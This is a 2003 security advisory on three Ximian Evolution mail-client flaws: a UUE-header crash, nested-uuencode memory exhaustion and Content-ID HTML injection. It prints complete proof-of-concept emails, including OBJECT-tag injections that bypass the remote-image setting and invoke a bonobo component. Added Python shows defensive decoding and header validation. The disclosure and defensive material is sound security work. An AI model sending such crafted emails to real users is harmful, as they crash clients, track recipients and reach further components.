20th Mar 2003 [SBWID-6077]
COMMAND
	Ximian's Evolution: multiple vulnerabilities
SYSTEMS AFFECTED
	Evolution 1.2.2 and prior releases are vulnerable, partially  or  wholly,
	to the vulnerabilities in this advisory.
PROBLEM
	In Core Security Technologies Advisory [CORE-20030304-01] :
	
	 http://www.coresecurity.com/common/showdoc.php?idx=309&idxseccion=10
	
	 *Credits:*
	 ==========
	These vulnerabilities were found by Diego  Kelyacoubian,  Javier  Kohen,
	Alberto Solino, and Juan Vera from  Core  Security  Technologies  during
	Bugweek 2003 (March 3-7, 2003).
	We would like to thank  Carlos  Montero  Luque  at  Ximian  for  quickly
	addressing  our  report  and  coordinating  the  generation  and  public
	release of patches and information regarding these vulnerabilities.
	Thanks also to Jeffrey Stedfast  and  other  members  of  the  Evolution
	development team for the followup and  development  of  the  patches  to
	close these vulnerabilities.
	 *Vulnerability Description:*
	 ============================
	Ximian Evolution is a  personal  and  workgroup  information  management
	solution for Linux  and  UNIX-based  systems.  The  software  integrates
	email, calendaring, meeting scheduling,  contact  management,  and  task
	lists, in one application. For more information about  Ximian  Evolution
	visit http://www.ximian.com
	Three vulnerabilities were found. Their impact ranges from denying users
	the ability to read email  and  provoking  system  instability,  through
	bypassing security context checks on email content, to the possible
	execution of arbitrary commands on vulnerable systems.
	The following security vulnerabilities were found:
	 [CAN-2003-0128, BID 7117]
	The Evolution mailer accepts UUEncoded content  and  will  transparently
	decode it. By including a specially crafted UUE header  as  part  of  an
	otherwise perfectly normal email, an attacker can crash Evolution as soon
	as the mail is parsed. This makes it particularly difficult to delete the
	email from Evolution's GUI and prevents the user from  reading  any  email
	until the malicious mail is removed from the mailbox.
	All versions of Evolution that include the  function  try_uudecoding  in
	the module mail/mail-format.c are vulnerable.
	 [CAN-2003-0129, BID 7118]
	Having the Evolution mailer process mail content that has been UUencoded
	multiple times causes resource starvation: the  MUA  keeps  allocating
	memory until it dies, possibly leading  to  system  instability.  The
	example in the technical details section uses email  content  encoded  3
	times.
	 [CAN-2003-0130, BID 7119]
	By including a specially crafted MIME Content-ID header as  part  of  an
	image/* MIME part, it is possible to include arbitrary  data,  including
	HTML tags, into the stream that is passed to GTKHtml for rendering.
	These vulnerabilities provide multiple  exploitation  possibilities  in
	the Evolution mailer. Namely, it is possible:
	 a) To crash the application. The crash appears to be the result
	   of heap corruption; further research on this bug is required
	   to demonstrate successful exploitation to run arbitrary commands
	   on vulnerable systems.
	 b) To bypass the "Don't connect to remote hosts to fetch images"
	   option.
	 c) To execute some bonobo components and pass them arbitrary content,
	   included as part of the mail.
	 *Technical Description - Exploit/Concept Code:*
	 ===============================================
	 [CAN-2003-0128, BID 7117]
	
	 The following email will reproduce this vulnerability, note that
	 an empty line is required before and after the UUE header line.
	 >From [email protected] Wed Mar  5 14:06:02 2003
	Subject: xxx
	From: X X. X <[email protected]>
	To: [email protected]
	Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
	Message-Id: <1046884154.1731.5.camel@vaiolin>
	Mime-Version: 1.0
	Date: 05 Mar 2003 14:09:14 -0300
	
	--=-mTDu5zdJIsixETTwCF5Y
	Content-Disposition: inline; filename=name
	Content-Type: application/octet-stream; name=name
	Content-Transfer-Encoding: 7bit
	
	begin 600
	
	end
	--=-mTDu5zdJIsixETTwCF5Y--
	
	 [CAN-2003-0129, BID 7118]
	
	 The following email will reproduce this vulnerability.
	 >From [email protected] Wed Mar  5 14:06:02 2003
	Subject: xxx
	From: X X. X <[email protected]>
	To: [email protected]
	Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
	Message-Id: <1046884154.1731.5.camel@vaiolin>
	Mime-Version: 1.0
	Date: 05 Mar 2003 14:09:14 -0300
	
	--=-mTDu5zdJIsixETTwCF5Y
	Content-Disposition: inline; filename=name
	Content-Type: application/octet-stream; name=name
	Content-Transfer-Encoding: 7bit
	
	begin 600 phase2
	M8F5G:6X@-C P('!H87-E,0I-.$8U1SHV6$ M0R!0*"<Q13XG,"HS,RA&+310
	M6RE%42 N,SQ9,3-1)S$T*%LU0R4Y*E0I.#-"*2 R,D19"DTP0B4Y+E4\5# C
	M138W-3!(*5,E+RHB/%$R(TA7*R0@7"E%52DN5#Q0,T!)+2I4*$$V,TTW+20\
	M7#%#,2 *32\D.%4P,T1',20@72E%42 O,SQ-,3) 1"LR7%0Q(S$@+$,Q-2PC
	M(%0K,S!(+$(Q(2A$(2DQ4TTR*#1 6 I-+4)5*R)$-$@I5#4O+S,\23131%8T
	M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ-,3-!-RTU*%HM4R4Y"C,J5#A-
	?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@  
	end
	--=-mTDu5zdJIsixETTwCF5Y--
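	As an added illustration, not code from this advisory or from Evolution,
	the following Python models the two defensive checks a uudecoder needs to
	survive the two inputs above. It accepts a "begin" line with nothing but a
	blank line between it and "end" (the CAN-2003-0128 shape) without ever
	handing an empty line to the data decoder, and it bounds both the number of
	nested envelopes it will peel and the bytes it emits per envelope, so content
	uuencoded three times (the CAN-2003-0129 shape) is refused instead of being
	decoded until memory runs out. The actual defect inside try_uudecoding is not
	described in the advisory, so the decoder is written from the uuencode format,
	not from Evolution's source; the limits MAX_DEPTH and MAX_OUTPUT and the
	function names are assumptions chosen for the example.

```python
import binascii

MAX_DEPTH = 2          # assumption: nested uuencode envelopes we are willing to peel
MAX_OUTPUT = 1 << 20   # assumption: cap on decoded bytes per envelope (1 MiB)


class UUDecodeError(ValueError):
    """Raised for any input the decoder refuses; a viewer would show the raw part instead."""


def uuencode(data: bytes, name: str = "payload", mode: int = 0o644) -> str:
    """Build a uuencode envelope; used here only to construct test input."""
    lines = [f"begin {mode:o} {name}"]
    for i in range(0, len(data), 45):                 # 45 input bytes per data line
        lines.append(binascii.b2a_uu(data[i:i + 45]).decode("ascii").rstrip("\n"))
    lines.append("`")                                 # conventional zero-length line
    lines.append("end")
    return "\n".join(lines) + "\n"


def nest(data: bytes, layers: int) -> str:
    """Wrap data in `layers` envelopes, innermost first (the CAN-2003-0129 shape)."""
    text = data
    for i in range(layers):
        text = uuencode(text, name=f"phase{layers - i}").encode("ascii")
    return text.decode("ascii")


def uudecode_once(text: str) -> bytes:
    """Decode one envelope. Tolerates an empty body and caps the output size."""
    lines = text.splitlines()
    starts = [i for i, line in enumerate(lines) if line.startswith("begin ")]
    if not starts:
        raise UUDecodeError("no begin line")
    header = lines[starts[0]].split()
    # "begin <octal mode> [name]"; the name is optional, as in the PoC's bare "begin 600"
    if len(header) < 2 or not all(c in "01234567" for c in header[1]):
        raise UUDecodeError("malformed begin line")
    out = bytearray()
    for line in lines[starts[0] + 1:]:
        if line == "end":
            return bytes(out)
        if line.strip() == "":
            continue            # blank line inside the body: skip it, never decode it
        try:
            out += binascii.a2b_uu(line)
        except binascii.Error as exc:
            raise UUDecodeError(f"bad data line: {exc}") from exc
        if len(out) > MAX_OUTPUT:
            raise UUDecodeError("decoded output exceeds MAX_OUTPUT")
    raise UUDecodeError("missing end line")


def looks_uuencoded(payload: bytes) -> bool:
    return any(line.startswith(b"begin ") for line in payload.splitlines())


def uudecode_nested(text: str, max_depth: int = MAX_DEPTH) -> bytes:
    """Peel nested envelopes; refuse once max_depth layers are decoded and the
    result is still uuencoded (bounded work instead of decode-until-OOM)."""
    for _ in range(max_depth):
        payload = uudecode_once(text)
        if not looks_uuencoded(payload):
            return payload
        text = payload.decode("ascii", errors="replace")
    raise UUDecodeError(f"more than {max_depth} nested uuencode layers")


def safe_decode(text: str, max_depth: int = MAX_DEPTH):
    """What a mail viewer would call: bytes on success, None when the part is refused."""
    try:
        return uudecode_nested(text, max_depth)
    except UUDecodeError:
        return None


# Body of the first PoC above: a "begin" line, a blank line, then "end".
EMPTY_BODY = "begin 600\n\nend\n"

if __name__ == "__main__":
    print(safe_decode(EMPTY_BODY))               # b'' : empty attachment, no crash
    triple = nest(b"hello", 3)
    print(safe_decode(triple, max_depth=3))      # b'hello'
    print(safe_decode(triple))                   # None : refused at MAX_DEPTH=2
```

	The depth limit is the important part for the second PoC: a decoder that
	simply loops while the output still looks like a uuencode envelope does
	exactly what the advisory describes, allocating a fresh buffer per layer
	for as long as the attacker cares to nest.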
	
	 [CAN-2003-0130, BID 7119]
	
	 The handle_image() function, located in the module
	 mail/mail-format.c, lacks proper input checking. This function does
	 not escape HTML characters in the string returned by get_cid, which
	 is in turn constructed from the Content-ID MIME header included in
	 the MIME part.
	 It can be exploited several ways, for instance:
	 a) The Evolution mailer will crash when a MIME part's Content-ID is
	    referenced from two different object tags via the cid "protocol".
	    The following email will reproduce this vulnerability in Evolution
	    version 1.2.1:
	 >From [email protected] Wed Mar  5 14:06:02 2003
	Subject: xxx
	From: X X. X <[email protected]>
	To: [email protected]
	Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
	Message-Id: <1046884154.1731.5.camel@vaiolin>
	Mime-Version: 1.0
	Date: 05 Mar 2003 14:09:14 -0300
	
	--=-mTDu5zdJIsixETTwCF5Y
	Content-Type: text/plain
	Content-Transfer-Encoding: 7bit
	Content-Id: hello
	
	Hello World!
	--=-mTDu5zdJIsixETTwCF5Y
	Content-Disposition: attachment; filename=name1.gif
	Content-Type: image/gif;  name=name1.gif
	Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr "
	Content-Transfer-Encoding: base64
	
	--=-mTDu5zdJIsixETTwCF5Y
	Content-Disposition: attachment; filename=name2.gif
	Content-Type: image/gif;  name=name2.gif
	Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr "
	Content-Transfer-Encoding: base64
	
	--=-mTDu5zdJIsixETTwCF5Y
	 b) The following email bypasses the "Don't connect to remote hosts
	    to fetch images" option.
	 >From [email protected] Wed Mar  5 14:06:02 2003
	Subject: xxx
	From: X X. X <[email protected]>
	To: [email protected]
	Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
	Message-Id: <1046884154.1731.5.camel@vaiolin>
	Mime-Version: 1.0
	Date: 05 Mar 2003 14:09:14 -0300
	
	--=-mTDu5zdJIsixETTwCF5Y
	Content-Type: text/html
	Content-Transfer-Encoding: 7bit
	Content-Id: apart
	
	<img src="http://external.host.com:anyport">
	--=-mTDu5zdJIsixETTwCF5Y
	Content-Disposition: attachment; filename=name2.gif
	Content-Type: image/gif;  name=name2.gif
	Content-Id: "><OBJECT classid="cid:apart" type="text/html"></OBJECT><hr "
	Content-Transfer-Encoding: base64
	
	--=-mTDu5zdJIsixETTwCF5Y
	 c) It is possible to execute bonobo components to handle content
	    types that Evolution mailer does not handle internally (for example
	    audio/ulaw). The following mail uses the Content-ID bug to execute
	    the bonobo-audio-ulaw component (bundled by default with bonobo)
	    and pass it arbitrary content.
	 >From [email protected] Wed Mar  5 14:06:02 2003
	Subject: xxx
	From: X X. X <[email protected]>
	To: [email protected]
	Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
	Message-Id: <1046884154.1731.5.camel@vaiolin>
	Mime-Version: 1.0
	Date: 05 Mar 2003 14:09:14 -0300
	
	--=-mTDu5zdJIsixETTwCF5Y
	Content-Type: audio/ulaw
	Content-Transfer-Encoding: 7bit
	Content-Id: mysong
	
	There she was, just walking down the street...
	--=-mTDu5zdJIsixETTwCF5Y
	Content-Disposition: attachment; filename=name2.gif
	Content-Type: image/gif;  name=name2.gif
	Content-Id: "><OBJECT classid="cid:mysong" type="audio/ulaw"></OBJECT><hr "
	Content-Transfer-Encoding: base64
	
	--=-mTDu5zdJIsixETTwCF5Y
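	As an added example, not from this advisory or from Evolution: Python that
	parses a message of the shape shown in (b), flags every MIME part whose
	Content-ID is not a plain message-id token, and sets the splice-the-header-
	into-markup pattern the advisory describes next to one that validates and
	escapes. The <img src="cid:..."> string is a stand-in for whatever
	handle_image() actually emitted (the advisory does not show the markup), the
	allowlist regex is deliberately narrower than the RFC 2822 msg-id grammar,
	and the sample message is constructed with example addresses and an example
	remote host.

```python
import email
import html
import re
from typing import List, Optional

# Allowlist for the id part of a Content-ID (assumption: narrower than the
# RFC 2822 msg-id grammar on purpose; anything outside it is not rendered at all).
CID_TOKEN = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._%+-]*(@[A-Za-z0-9.-]+)?$")

# Constructed sample in the shape of PoC (b) above; addresses and host are examples.
SAMPLE = """\
From: X X. X <sender@example.com>
To: victim@example.com
Subject: xxx
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"

--=-mTDu5zdJIsixETTwCF5Y
Content-Type: text/html
Content-Transfer-Encoding: 7bit
Content-Id: apart

<img src="http://remote.example/tracker.gif">

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "><OBJECT classid="cid:apart" type="text/html"></OBJECT><hr "
Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y--
"""


def raw_cid(header_value: str) -> str:
    """Model of a naive get_cid(): drop whitespace and enclosing <...>, nothing more."""
    value = header_value.strip()
    if value.startswith("<") and value.endswith(">"):
        value = value[1:-1]
    return value


def render_image_unsafe(header_value: str) -> str:
    """The pattern the advisory describes: header text spliced into the HTML stream.
    The <img src="cid:..."> form is a stand-in; Evolution's real markup is not shown."""
    return f'<img src="cid:{raw_cid(header_value)}">'


def render_image_safe(header_value: str) -> Optional[str]:
    """Validate against the allowlist, then escape anyway; None means 'show a placeholder'."""
    cid = raw_cid(header_value)
    if not CID_TOKEN.match(cid):
        return None
    return f'<img src="cid:{html.escape(cid, quote=True)}">'


def scan_message(raw: str) -> List[dict]:
    """Flag every MIME part whose Content-ID render_image_safe() would reject."""
    msg = email.message_from_string(raw)      # compat32 policy: header values are plain str
    findings = []
    for index, part in enumerate(msg.walk()):
        cid = part.get("Content-Id")
        if cid is None or CID_TOKEN.match(raw_cid(cid)):
            continue
        findings.append({"part": index,
                         "content_type": part.get_content_type(),
                         "content_id": cid})
    return findings


if __name__ == "__main__":
    for finding in scan_message(SAMPLE):
        print("suspicious Content-ID in part", finding["part"], finding["content_type"])
        print("  unsafe :", render_image_unsafe(finding["content_id"]))
        print("  safe   :", render_image_safe(finding["content_id"]))
```

	The unsafe renderer closes the src attribute with the leading `">` of the
	header and hands GtkHTML a live OBJECT element pointing at the text/html
	part, which is how the remote-image option is bypassed in (b) and how the
	bonobo component is reached in (c); the safe renderer never reaches the
	escape step for that header because the allowlist rejects it first. The
	scanner is the same test applied as a mail-gateway check.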
	
SOLUTION
	Ximian is  providing  Evolution  1.2.3  on  [March  18/March  19].  This
	release resolves all vulnerabilities in this advisory as well  as  other
	unrelated bugs. The patched  code  for  Evolution  that  resolves  these
	vulnerabilities is also already available in GNOME CVS.
	A workaround for unpatched versions of Evolution  to  prevent  Evolution
	from crashing when viewing messages that exploit  these  vulnerabilities
	is to go into "View"->"Message Display" and change the  value  to  "Show
	E-mail Source."
	Distribution vendors who provide their own  version  of  Evolution  have
	been advised of these  issues  as  well  as  having  been  provided  the
	patches to fix  them.  They  may  provide  updated  packages  for  their
	distributions.